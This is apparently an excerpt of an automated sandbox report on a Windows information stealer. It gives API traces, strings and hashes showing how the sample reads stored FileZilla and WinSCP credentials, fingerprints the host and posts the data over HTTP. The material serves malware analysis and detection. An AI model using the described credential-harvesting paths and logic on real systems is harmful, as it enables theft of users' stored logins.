                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrlen$lstrcpy$AllocFile$CreateHeapLocallstrcat$CloseFolderHandleObjectPathProcessReadSingleSizeThreadWaitstrtok_s
                                                                                                        • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
                                                                                                        • API String ID: 4146028692-935134978
                                                                                                        • Opcode ID: daf18828ca77f1c77d3f07f28c52861645635e7fac20ced428b2830730ead7d9
                                                                                                        • Instruction ID: 2e9f852a615408e756f1d7d3730d5668bfc6bf7d6dc94c0724fe4efb67adb4f0
                                                                                                        • Opcode Fuzzy Hash: daf18828ca77f1c77d3f07f28c52861645635e7fac20ced428b2830730ead7d9
                                                                                                        • Instruction Fuzzy Hash: 6FA17572A40219BBCF01FBA1DD4AADD7775AF08305F105426F501F30A1EBB9AE498F99
                                                                                                        Function 00405F39 Relevance: 53.0, APIs: 20, Strings: 10, Instructions: 466networkstringmemoryCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 451 405f39-405ffe call 410519 call 404ab6 call 4104e7 * 5 InternetOpenA StrCmpCA 466 406000 451->466 467 406006-40600c 451->467 466->467 468 406012-40619c call 411c4a call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 4105c7 call 41058d call 402920 * 2 InternetConnectA 467->468 469 4066ff-406727 InternetCloseHandle call 408048 467->469 468->469 545 4061a2-4061dc HttpOpenRequestA 468->545 475 406766-4067ec call 402920 * 4 call 401cde call 402920 call 41d016 469->475 476 406729-406761 call 410549 call 410609 call 41058d call 402920 469->476 476->475 546 4061e2-4061e8 545->546 547 4066f3-4066f9 InternetCloseHandle 545->547 548 406206-406690 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 lstrlenA * 2 GetProcessHeap HeapAlloc lstrlenA call 427050 lstrlenA * 2 call 427050 lstrlenA HttpSendRequestA 546->548 549 4061ea-406200 InternetSetOptionA 546->549 547->469 692 4066d2-4066ea InternetReadFile 548->692 549->548 693 406692-40669a 692->693 694 4066ec-4066ed InternetCloseHandle 692->694 693->694 695 40669c-4066cd call 410609 call 41058d call 402920 693->695 694->547 695->692
                                                                                                        APIs
                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                          • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                          • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                        • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00405FD8
                                                                                                        • StrCmpCA.SHLWAPI(?), ref: 00405FF6
                                                                                                        • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040618E
                                                                                                        • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 004061D2
                                                                                                        • lstrlenA.KERNEL32(?,",mode,004378D8,------,004378CC,e90840a846d017e7b095f7543cdf2d15,",build_id,004378B4,------,004378A8,",0043789C,------), ref: 004065FD
                                                                                                        • lstrlenA.KERNEL32(?), ref: 0040660C
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00406617
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0040661E
                                                                                                        • lstrlenA.KERNEL32(?), ref: 0040662B
                                                                                                        • _memmove.LIBCMT ref: 00406639
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00406647
                                                                                                        • lstrlenA.KERNEL32(?,?,00000000), ref: 00406655
                                                                                                        • _memmove.LIBCMT ref: 00406662
                                                                                                        • lstrlenA.KERNEL32(?,?,00000000), ref: 00406677
                                                                                                        • HttpSendRequestA.WININET(00000000,?,00000000), ref: 00406685
                                                                                                        • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 004066E2
                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 004066ED
                                                                                                        • InternetCloseHandle.WININET(?), ref: 004066F9
                                                                                                        • InternetCloseHandle.WININET(?), ref: 00406705
                                                                                                        • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406200
                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequest_memmovelstrcat$AllocConnectCrackFileOptionProcessReadSend
                                                                                                        • String ID: "$"$"$------$------$------$------$build_id$e90840a846d017e7b095f7543cdf2d15$mode
                                                                                                        • API String ID: 3702379033-4195047346
                                                                                                        • Opcode ID: 01e41bab29020057977b5875c426518cc7d1618c45e0f03a21d56cb97033aecb
                                                                                                        • Instruction ID: 82dd920f4857eb4424cccb8e833476094bcda5e32b3baf042c939ae059a0737f
                                                                                                        • Opcode Fuzzy Hash: 01e41bab29020057977b5875c426518cc7d1618c45e0f03a21d56cb97033aecb
                                                                                                        • Instruction Fuzzy Hash: FF22B9719401699BCF21EB62CD46BCCB7B5AF04308F4144E7A60DB3151DAB56FCA8FA8
                                                                                                        Function 0040E186 Relevance: 51.1, APIs: 15, Strings: 14, Instructions: 325registryCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • _memset.LIBCMT ref: 0040E1B7
                                                                                                        • _memset.LIBCMT ref: 0040E1D7
                                                                                                        • _memset.LIBCMT ref: 0040E1E8
                                                                                                        • _memset.LIBCMT ref: 0040E1F9
                                                                                                        • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E22D
                                                                                                        • RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0040E25E
                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E2BD
                                                                                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 0040E2E0
                                                                                                        • RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,Host: ,Soft: WinSCP,004368E7), ref: 0040E379
                                                                                                        • RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,?), ref: 0040E3D9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _memset$Value$Open$Enum
                                                                                                        • String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
                                                                                                        • API String ID: 3303087153-2798830873
                                                                                                        • Opcode ID: 9cb75a7071ecb74fff9e56ced005ca6b64a065f8bcd1bf242cfed6becfa28f4e
                                                                                                        • Instruction ID: 1c66541d4828bd9326f921050ea70c7b79589cb9660c5b8585550bf775721ac0
                                                                                                        • Opcode Fuzzy Hash: 9cb75a7071ecb74fff9e56ced005ca6b64a065f8bcd1bf242cfed6becfa28f4e
                                                                                                        • Instruction Fuzzy Hash: B5D1D6B295012DAADF20EB91DC42BD9B778AF04308F5018EBA508B3151DA747FC9CFA5
                                                                                                        Function 00418643 Relevance: 48.2, APIs: 32, Instructions: 154libraryloaderCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 821 418643-418653 call 41859a 824 418844-4188a1 LoadLibraryA * 5 821->824 825 418659-41883f call 407d47 GetProcAddress * 20 821->825 826 4188a3-4188b0 GetProcAddress 824->826 827 4188b5-4188bc 824->827 825->824 826->827 829 4188e7-4188ee 827->829 830 4188be-4188e2 GetProcAddress * 2 827->830 832 4188f0-4188fd GetProcAddress 829->832 833 418902-418909 829->833 830->829 832->833 834 41890b-418918 GetProcAddress 833->834 835 41891d-418924 833->835 834->835 837 418926-41894a GetProcAddress * 2 835->837 838 41894f 835->838 837->838
                                                                                                        APIs
                                                                                                        • GetProcAddress.KERNEL32 ref: 00418684
                                                                                                        • GetProcAddress.KERNEL32 ref: 0041869B
                                                                                                        • GetProcAddress.KERNEL32 ref: 004186B2
                                                                                                        • GetProcAddress.KERNEL32 ref: 004186C9
                                                                                                        • GetProcAddress.KERNEL32 ref: 004186E0
                                                                                                        • GetProcAddress.KERNEL32 ref: 004186F7
                                                                                                        • GetProcAddress.KERNEL32 ref: 0041870E
                                                                                                        • GetProcAddress.KERNEL32 ref: 00418725
                                                                                                        • GetProcAddress.KERNEL32 ref: 0041873C
                                                                                                        • GetProcAddress.KERNEL32 ref: 00418753
                                                                                                        • GetProcAddress.KERNEL32 ref: 0041876A
                                                                                                        • GetProcAddress.KERNEL32 ref: 00418781
                                                                                                        • GetProcAddress.KERNEL32 ref: 00418798
                                                                                                        • GetProcAddress.KERNEL32 ref: 004187AF
                                                                                                        • GetProcAddress.KERNEL32 ref: 004187C6
                                                                                                        • GetProcAddress.KERNEL32 ref: 004187DD
                                                                                                        • GetProcAddress.KERNEL32 ref: 004187F4
                                                                                                        • GetProcAddress.KERNEL32 ref: 0041880B
                                                                                                        • GetProcAddress.KERNEL32 ref: 00418822
                                                                                                        • GetProcAddress.KERNEL32 ref: 00418839
                                                                                                        • LoadLibraryA.KERNEL32(?,004184C2), ref: 0041884A
                                                                                                        • LoadLibraryA.KERNEL32(?,004184C2), ref: 0041885B
                                                                                                        • LoadLibraryA.KERNEL32(?,004184C2), ref: 0041886C
                                                                                                        • LoadLibraryA.KERNEL32(?,004184C2), ref: 0041887D
                                                                                                        • LoadLibraryA.KERNEL32(?,004184C2), ref: 0041888E
                                                                                                        • GetProcAddress.KERNEL32(75070000,004184C2), ref: 004188AA
                                                                                                        • GetProcAddress.KERNEL32(75FD0000,004184C2), ref: 004188C5
                                                                                                        • GetProcAddress.KERNEL32 ref: 004188DC
                                                                                                        • GetProcAddress.KERNEL32(75A50000,004184C2), ref: 004188F7
                                                                                                        • GetProcAddress.KERNEL32(74E50000,004184C2), ref: 00418912
                                                                                                        • GetProcAddress.KERNEL32(76E80000,004184C2), ref: 0041892D
                                                                                                        • GetProcAddress.KERNEL32 ref: 00418944
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$LibraryLoad
                                                                                                        • String ID:
                                                                                                        • API String ID: 2238633743-0
                                                                                                        • Opcode ID: 4153ecd493db34a1094e14b788043fe07f5e2afe7ddd22b5ff6fe96697fb63f9
                                                                                                        • Instruction ID: 2c76b628124a1797fdce28c748a09696ce6250a2eaa67b4899ff399dadce2328
                                                                                                        • Opcode Fuzzy Hash: 4153ecd493db34a1094e14b788043fe07f5e2afe7ddd22b5ff6fe96697fb63f9
                                                                                                        • Instruction Fuzzy Hash: 96711675910312AFEF1ADF60FD088243BA7F70874BF10A426E91582270EB374A64EF55
                                                                                                        Function 00413B86 Relevance: 47.9, APIs: 2, Strings: 25, Instructions: 674stringCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 839 413b86-4145a5 call 4104e7 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410cc0 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4115d4 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411684 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4109a2 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 GetCurrentProcessId call 41224a call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410b30 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411807 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411997 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410c85 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410c53 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411563 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410ddb call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410cc0 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410d2e call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410f51 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411007 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410fba call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411119 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411192 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4114a5 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411203 call 4105c7 call 41058d call 402920 * 2 call 411203 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 401cfd lstrlenA call 4104e7 call 416e97 call 402920 * 2 call 401cde
                                                                                                        APIs
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                          • Part of subcall function 00410CC0: GetProcessHeap.KERNEL32(00000000,00000104,?,Version: ,004365B6,?,?,?), ref: 00410CD8
                                                                                                          • Part of subcall function 00410CC0: HeapAlloc.KERNEL32(00000000), ref: 00410CDF
                                                                                                          • Part of subcall function 00410CC0: GetLocalTime.KERNEL32(?), ref: 00410CEB
                                                                                                          • Part of subcall function 00410CC0: wsprintfA.USER32 ref: 00410D16
                                                                                                          • Part of subcall function 004115D4: _memset.LIBCMT ref: 00411607
                                                                                                          • Part of subcall function 004115D4: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 00411626
                                                                                                          • Part of subcall function 004115D4: RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 0041164B
                                                                                                          • Part of subcall function 004115D4: CharToOemA.USER32(?,?), ref: 0041166B
                                                                                                          • Part of subcall function 00411684: GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F
                                                                                                          • Part of subcall function 00411684: _memset.LIBCMT ref: 004116CE
                                                                                                          • Part of subcall function 00411684: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116F6
                                                                                                          • Part of subcall function 00411684: lstrcatA.KERNEL32(?,00436ECC,?,?,?,?,?), ref: 00411713
                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                          • Part of subcall function 004109A2: GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 004109D5
                                                                                                          • Part of subcall function 004109A2: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00410A15
                                                                                                          • Part of subcall function 004109A2: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00410A6A
                                                                                                          • Part of subcall function 004109A2: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410A71
                                                                                                        • GetCurrentProcessId.KERNEL32(Path: ,0043687C,HWID: ,00436870,GUID: ,00436864,00000000,MachineID: ,00436854,00000000,Date: ,00436848,00436844,004379AC,Version: ,004365B6), ref: 00413DDB
                                                                                                          • Part of subcall function 0041224A: OpenProcess.KERNEL32(00000410,00000000,=A,00000000,?), ref: 0041226C
                                                                                                          • Part of subcall function 0041224A: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00412287
                                                                                                          • Part of subcall function 0041224A: CloseHandle.KERNEL32(00000000), ref: 0041228E
                                                                                                          • Part of subcall function 00410B30: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B44
                                                                                                          • Part of subcall function 00410B30: HeapAlloc.KERNEL32(00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B4B
                                                                                                          • Part of subcall function 00411807: __EH_prolog3_catch_GS.LIBCMT ref: 0041180E
                                                                                                          • Part of subcall function 00411807: CoInitializeEx.OLE32(00000000,00000000,0000004C,00413EF9,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 0041181F
                                                                                                          • Part of subcall function 00411807: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411830
                                                                                                          • Part of subcall function 00411807: CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 0041184A
                                                                                                          • Part of subcall function 00411807: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411880
                                                                                                          • Part of subcall function 00411807: VariantInit.OLEAUT32(?), ref: 004118DB
                                                                                                          • Part of subcall function 00411997: __EH_prolog3_catch.LIBCMT ref: 0041199E
                                                                                                          • Part of subcall function 00411997: CoInitializeEx.OLE32(00000000,00000000,00000030,00413F67,?,AV: ,004368C4,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 004119AD
                                                                                                          • Part of subcall function 00411997: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 004119BE
                                                                                                          • Part of subcall function 00411997: CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 004119D8
                                                                                                          • Part of subcall function 00411997: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411A0E
                                                                                                          • Part of subcall function 00411997: VariantInit.OLEAUT32(?), ref: 00411A5D
                                                                                                          • Part of subcall function 00410C85: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
                                                                                                          • Part of subcall function 00410C85: HeapAlloc.KERNEL32(00000000,?,?,?,00401385), ref: 00410C98
                                                                                                          • Part of subcall function 00410C85: GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC
                                                                                                          • Part of subcall function 00410C53: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
                                                                                                          • Part of subcall function 00410C53: HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C66
                                                                                                          • Part of subcall function 00410C53: GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A
                                                                                                          • Part of subcall function 00411563: CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 00411575
                                                                                                          • Part of subcall function 00411563: GetDeviceCaps.GDI32(00000000,00000008), ref: 00411580
                                                                                                          • Part of subcall function 00411563: GetDeviceCaps.GDI32(00000000,0000000A), ref: 0041158B
                                                                                                          • Part of subcall function 00411563: ReleaseDC.USER32(00000000,00000000), ref: 00411596
                                                                                                          • Part of subcall function 00411563: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00414098,?,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4), ref: 004115A2
                                                                                                          • Part of subcall function 00411563: HeapAlloc.KERNEL32(00000000,?,?,00414098,?,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 004115A9
                                                                                                          • Part of subcall function 00411563: wsprintfA.USER32 ref: 004115BB
                                                                                                          • Part of subcall function 00410DDB: GetKeyboardLayoutList.USER32(00000000,00000000,0043670D,?,?), ref: 00410E0C
                                                                                                          • Part of subcall function 00410DDB: LocalAlloc.KERNEL32(00000040,00000000), ref: 00410E1A
                                                                                                          • Part of subcall function 00410DDB: GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00410E28
                                                                                                          • Part of subcall function 00410DDB: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00410E57
                                                                                                          • Part of subcall function 00410DDB: LocalFree.KERNEL32(00000000), ref: 00410EFF
                                                                                                          • Part of subcall function 00410D2E: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00410D49
                                                                                                          • Part of subcall function 00410D2E: HeapAlloc.KERNEL32(00000000), ref: 00410D50
                                                                                                          • Part of subcall function 00410D2E: GetTimeZoneInformation.KERNEL32(?), ref: 00410D5F
